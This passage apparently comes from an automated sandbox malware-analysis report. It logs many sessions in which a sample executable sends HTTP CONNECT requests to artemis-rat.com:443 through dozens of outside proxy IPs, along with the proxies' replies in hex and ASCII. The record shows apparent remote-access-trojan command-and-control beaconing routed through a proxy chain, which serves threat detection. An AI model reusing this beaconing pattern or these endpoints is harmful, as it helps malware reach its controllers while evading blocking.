                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.406167984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207719088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.499191046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.905025959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1407192.168.2.55236091.187.113.6880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.091183901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.005601883 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1408192.168.2.553811192.210.228.28156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.091458082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1409192.168.2.553779113.204.4.142108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.095860958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1410192.168.2.552365103.124.137.20331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.096786022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.394287109 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1411192.168.2.553128184.178.172.2641453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.098514080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1412192.168.2.5538121.15.62.1256783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.098710060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1413192.168.2.553785111.88.240.20110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.098941088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1414192.168.2.553813185.125.169.2481183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.109834909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.527471066 CET131INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1415192.168.2.553794102.132.201.202803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.121809959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1416192.168.2.553814147.139.140.74803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.122401953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.308583975 CET104INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache/2.4.37 (Alibaba Cloud Linux) OpenSSL/1.1.1k
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.310197115 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c d4 c3 34 04 20 fd 59 5e 23 e8 f8 df f7 34 a0 31 bf 01 a9 63 33 07 d4 63 86 eb 92 35 63 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: el4 Y^#41c3c5c*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.462603092 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                                                                                                                                                                                            Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1417192.168.2.55341043.129.228.4678913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.123373985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1418192.168.2.552330103.213.219.20031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.180169106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.201982975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202159882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.287904024 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1419192.168.2.552347193.136.97.17803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.188929081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.202013969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202172041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.217653036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1420192.168.2.55381945.233.2.141533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.190351963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1421192.168.2.55381874.118.80.24431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.190565109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1422192.168.2.553825104.27.66.31803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.190743923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.344831944 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1423192.168.2.55347034.176.113.14831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.197274923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:35.651700974 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:36.443967104 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:37.308018923 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:39.036020041 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:42.555923939 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:49.468103886 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:03.294523954 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:31.455944061 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1424192.168.2.55382047.74.226.850013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.198609114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1425192.168.2.553566117.160.250.16380813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.234368086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.190834999 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1426192.168.2.553823198.37.57.112803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.253667116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.484904051 CET503INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 324
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1427192.168.2.552484198.57.211.235110963876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.340641975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.405164003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.405400038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1428192.168.2.553467103.180.123.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.349536896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.992332935 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1429192.168.2.553446154.65.39.7803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.349705935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
